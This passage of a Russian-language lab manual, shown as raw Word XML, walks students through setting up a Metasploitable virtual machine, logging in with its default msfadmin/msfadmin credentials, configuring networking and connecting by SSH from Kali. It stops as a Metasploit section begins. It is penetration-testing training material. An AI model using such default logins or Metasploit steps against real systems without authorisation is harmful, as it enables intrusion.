      <w:r w:rsidR="00E6762B">
        <w:t>Распаковать архив</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0B8FB4" w14:textId="77777777" w:rsidR="0058112A" w:rsidRDefault="0058112A" w:rsidP="00E6762B"/>
    <w:p w14:paraId="5256C27C" w14:textId="510DE4B3" w:rsidR="00E6762B" w:rsidRPr="009B5379" w:rsidRDefault="00D63AC5" w:rsidP="00E6762B">
      <w:r w:rsidRPr="00D63AC5">
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidR="00E6762B" w:rsidRPr="009B5379">
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="00E6762B">
        <w:t xml:space="preserve">Запустить </w:t>
      </w:r>
      <w:r w:rsidR="00E6762B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Oracle</w:t>
      </w:r>
      <w:r w:rsidR="00E6762B" w:rsidRPr="009B5379">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E6762B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68188787" w14:textId="77777777" w:rsidR="0058112A" w:rsidRDefault="0058112A" w:rsidP="00E6762B"/>
    <w:p w14:paraId="656FE104" w14:textId="27A10A01" w:rsidR="00E6762B" w:rsidRDefault="00D63AC5" w:rsidP="00E6762B">
      <w:r w:rsidRPr="00D63AC5">
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidR="00E6762B">
        <w:t>4. Выбрать Машина – Создать</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68099C81" w14:textId="77777777" w:rsidR="0058112A" w:rsidRDefault="0058112A" w:rsidP="00E6762B"/>
    <w:p w14:paraId="10184BB8" w14:textId="64987CE9" w:rsidR="00E6762B" w:rsidRPr="005D4A9F" w:rsidRDefault="00E6762B" w:rsidP="00C10AF0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="369CD5BD" wp14:editId="6E0358EB">
            <wp:extent cx="5758815" cy="4000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197" b="1749"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="400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86900" w14:textId="77777777" w:rsidR="0058112A" w:rsidRDefault="0058112A" w:rsidP="004538DC"/>
    <w:p w14:paraId="7C1A3ABD" w14:textId="10143816" w:rsidR="00E6762B" w:rsidRPr="005D4A9F" w:rsidRDefault="00D63AC5" w:rsidP="004538DC">
      <w:r w:rsidRPr="00D63AC5">
        <w:t>9.5</w:t>
      </w:r>
      <w:r w:rsidR="00E6762B" w:rsidRPr="005D4A9F">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E6762B">
        <w:t>Запустить виртуальную машину</w:t>
      </w:r>
      <w:r w:rsidR="004538DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E6762B" w:rsidRPr="005D4A9F">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="154C6F48" w14:textId="54521CDD" w:rsidR="00E6762B" w:rsidRPr="005D4A9F" w:rsidRDefault="00D63AC5" w:rsidP="00E6762B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00E6762B" w:rsidRPr="005D4A9F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004538DC">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="005405C2">
        <w:t xml:space="preserve">В виртуальной машине </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005405C2" w:rsidRPr="00C10AF0">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005405C2" w:rsidRPr="00C10AF0">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005405C2">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="00E6762B">
        <w:t xml:space="preserve">вести логин и пароль </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E6762B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E6762B" w:rsidRPr="005D4A9F">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E6762B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73ABE9F0" w14:textId="77777777" w:rsidR="004538DC" w:rsidRDefault="004538DC" w:rsidP="001D3325"/>
    <w:p w14:paraId="3055D222" w14:textId="2233D4D0" w:rsidR="00E6762B" w:rsidRPr="0058112A" w:rsidRDefault="00D63AC5" w:rsidP="001D3325">
      <w:pPr>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0058112A">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="001D3325" w:rsidRPr="0058112A">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>. Настроить новый сетевой интерфейс</w:t>
      </w:r>
      <w:r w:rsidR="004538DC" w:rsidRPr="0058112A">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> для виртуальной машины </w:t>
      </w:r>
      <w:r w:rsidR="004538DC" w:rsidRPr="0058112A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676B25EF" w14:textId="77777777" w:rsidR="00540FFB" w:rsidRPr="00D63AC5" w:rsidRDefault="00540FFB" w:rsidP="001D3325">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nano</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>network</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149B3BE3" w14:textId="77777777" w:rsidR="00540FFB" w:rsidRPr="00540FFB" w:rsidRDefault="00540FFB" w:rsidP="001D3325">
      <w:r>
        <w:t>Добавить в конец строчки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225522D2" w14:textId="77777777" w:rsidR="00540FFB" w:rsidRPr="0058112A" w:rsidRDefault="00540FFB" w:rsidP="001D3325">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>auto</w:t>
      </w:r>
      <w:r w:rsidRPr="0058112A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eth</w:t>
      </w:r>
      <w:r w:rsidRPr="0058112A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3725A456" w14:textId="77777777" w:rsidR="00540FFB" w:rsidRPr="0058112A" w:rsidRDefault="00540FFB" w:rsidP="001D3325">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>iface</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058112A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eth</w:t>
      </w:r>
      <w:r w:rsidRPr="0058112A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058112A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dhcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A1E4D1C" w14:textId="77777777" w:rsidR="00540FFB" w:rsidRPr="00540FFB" w:rsidRDefault="00540FFB" w:rsidP="001D3325">
      <w:r>
        <w:t>Закрыть и сохранить</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7042C3FD" w14:textId="77777777" w:rsidR="004538DC" w:rsidRDefault="004538DC" w:rsidP="001D3325"/>
    <w:p w14:paraId="6C95CB28" w14:textId="31F71DE6" w:rsidR="00540FFB" w:rsidRPr="00AC7B06" w:rsidRDefault="00D63AC5" w:rsidP="001D3325">
      <w:r w:rsidRPr="005405C2">
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidR="00AC7B06" w:rsidRPr="00AC7B06">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00540FFB">
        <w:t>Поднять новый интерфейс</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499F9E43" w14:textId="77777777" w:rsidR="00540FFB" w:rsidRPr="00D63AC5" w:rsidRDefault="00540FFB" w:rsidP="001D3325">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ifup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eth</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B875D5D" w14:textId="77777777" w:rsidR="00540FFB" w:rsidRPr="00540FFB" w:rsidRDefault="00540FFB" w:rsidP="001D3325">
      <w:r w:rsidRPr="00AC7B06">
        <w:t>Проверить:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63157746" w14:textId="77777777" w:rsidR="00304938" w:rsidRPr="00D63AC5" w:rsidRDefault="00540FFB" w:rsidP="001D3325">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400243FD" w14:textId="77777777" w:rsidR="004538DC" w:rsidRDefault="004538DC" w:rsidP="000635E1"/>
    <w:p w14:paraId="59FFD268" w14:textId="5AE16F67" w:rsidR="00540FFB" w:rsidRDefault="00D63AC5" w:rsidP="000635E1">
      <w:r w:rsidRPr="00D63AC5">
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidR="00393337" w:rsidRPr="00866471">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00304938">
        <w:t xml:space="preserve">Проверить </w:t>
      </w:r>
      <w:r w:rsidR="00D538C1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r w:rsidR="00304938">
        <w:t xml:space="preserve"> в обе </w:t>
      </w:r>
      <w:commentRangeStart w:id="0"/>
      <w:r w:rsidR="00304938">
        <w:t>стороны</w:t>
      </w:r>
      <w:commentRangeEnd w:id="0"/>
      <w:r w:rsidR="0058112A">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="0"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36833478" w14:textId="6280BA55" w:rsidR="005C0AE0" w:rsidRDefault="005C0AE0" w:rsidP="000635E1"/>
    <w:p w14:paraId="639C51A3" w14:textId="1EF257B1" w:rsidR="00A34227" w:rsidRPr="00495DA8" w:rsidRDefault="005C0AE0" w:rsidP="000635E1">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14. </w:t>
      </w:r>
      <w:r w:rsidR="00A34227" w:rsidRPr="005C0AE0">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Демонстрация </w:t>
      </w:r>
      <w:r w:rsidR="00495DA8">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">работы протокола </w:t>
      </w:r>
      <w:commentRangeStart w:id="1"/>
      <w:r w:rsidR="00495DA8">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:commentRangeEnd w:id="1"/>
      <w:r w:rsidR="00154310">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="1"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF4CE46" w14:textId="2C5E7E29" w:rsidR="00A34227" w:rsidRPr="00495DA8" w:rsidRDefault="00A34227" w:rsidP="000635E1">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00495DA8">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">С дистрибутива </w:t>
      </w:r>
      <w:r w:rsidRPr="00495DA8">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidR="00495DA8">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> выполнить подключение удалённого управления:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9B079A" w14:textId="799CD779" w:rsidR="00A34227" w:rsidRDefault="00A34227" w:rsidP="000635E1">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="2"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00495DA8">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00495DA8" w:rsidRPr="00495DA8">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">msfadmin@192.168.56.102 </w:t>
      </w:r>
      <w:commentRangeEnd w:id="2"/>
      <w:r w:rsidR="003034C2">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="2"/>
      </w:r>
      <w:r w:rsidRPr="00495DA8">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00495DA8">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00495DA8">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00495DA8">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>адрес</w:t>
      </w:r>
      <w:r w:rsidRPr="00495DA8">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00495DA8">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00495DA8">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11033C7D" w14:textId="30823E0A" w:rsidR="009E2FD9" w:rsidRPr="009E2FD9" w:rsidRDefault="009E2FD9" w:rsidP="000635E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E2FD9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Здесь и далее</w:t>
      </w:r>
      <w:r w:rsidRPr="009E2FD9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Вы должны использовать в командах </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E2FD9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E2FD9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">-адреса </w:t>
      </w:r>
      <w:r w:rsidRPr="009E2FD9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ВАШИХ виртуальных машин</w:t>
      </w:r>
      <w:r w:rsidRPr="009E2FD9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7F56D8" w14:textId="77777777" w:rsidR="00A34227" w:rsidRPr="009E2FD9" w:rsidRDefault="00A34227" w:rsidP="00A34227">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23336347" w14:textId="77777777" w:rsidR="00A34227" w:rsidRPr="0058112A" w:rsidRDefault="00A34227" w:rsidP="00A34227">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05746739" w14:textId="2CEC5B43" w:rsidR="00A34227" w:rsidRPr="00495DA8" w:rsidRDefault="00A34227" w:rsidP="00A34227">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA8B3AC" w14:textId="77777777" w:rsidR="00A34227" w:rsidRPr="00495DA8" w:rsidRDefault="00A34227" w:rsidP="00A34227">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4595FA13" w14:textId="77777777" w:rsidR="00D538C1" w:rsidRDefault="00D538C1">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F299F5" w14:textId="3537EB46" w:rsidR="00D538C1" w:rsidRPr="002A4ECB" w:rsidRDefault="00D538C1" w:rsidP="005E5A93">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A4ECB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>III</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4ECB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. Выполнение работ с </w:t>
      </w:r>
      <w:r w:rsidRPr="002A4ECB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C01AFA4" w14:textId="4E4DF975" w:rsidR="005B2089" w:rsidRDefault="00D538C1" w:rsidP="005E5A93">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="00F357F2" w:rsidRPr="00FB0948">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00F357F2">
        <w:t xml:space="preserve">Запустить </w:t>
      </w:r>
      <w:r w:rsidR="00F357F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2067DB77" w14:textId="4ED3FA2D" w:rsidR="00D538C1" w:rsidRPr="00FB0948" w:rsidRDefault="00D538C1" w:rsidP="001543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31720E" wp14:editId="4E2F38D4">
            <wp:extent cx="5760000" cy="43218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09AA" w14:textId="652ABB26" w:rsidR="002A4ECB" w:rsidRPr="00154310" w:rsidRDefault="002A4ECB" w:rsidP="002A4ECB">
      <w:pPr>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> можно также открыть совершив следующие действия</w:t>
      </w:r>
      <w:r w:rsidR="00154310" w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00154310" w:rsidRPr="00154310">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>выполнять необязательно</w:t>
      </w:r>
      <w:r w:rsidR="009C0952" w:rsidRPr="009C0952">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009C0952" w:rsidRPr="009C0952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C0952" w:rsidRPr="009C0952">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>т.к. это просто второй вариант выполнения задачи</w:t>
      </w:r>
      <w:r w:rsidR="00154310" w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE47ADA" w14:textId="77777777" w:rsidR="002A4ECB" w:rsidRPr="00154310" w:rsidRDefault="002A4ECB" w:rsidP="002A4ECB">
      <w:pPr>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">Не закрывая терминал в </w:t>
      </w:r>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00154310">
        <w:rPr>
          <w:spacing w:val="-8"/>
